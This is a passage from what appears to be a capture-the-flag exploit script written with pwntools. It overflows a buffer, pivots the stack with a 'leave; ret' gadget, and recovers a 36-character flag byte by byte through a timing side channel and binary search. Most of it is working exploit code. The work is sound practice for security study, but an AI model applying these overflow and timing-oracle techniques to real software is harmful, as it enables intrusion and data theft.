p.sendafter(b"easyhack\n", pay1) p.recvline() payload = b'A'*0x2A payload += p64(bss+0x100) payload += p64(0x401441) # level; ret p.send(payload) p.send(p8(idx)+bytes([ch])) t = time.time() p.clean(0.3) t = time.time()-t p.close() print(t) return t > 0.28
flag = ""for i in range(len(flag), 36): l = 0x2D r = 0x66 while l < r: mid = (l+r)//2 res = test(i, mid) if res: r = mid else: l = mid+1 print(l, r, chr(l), chr(r)) flag += chr(l) print(flag)
print('flag{'+flag+'}')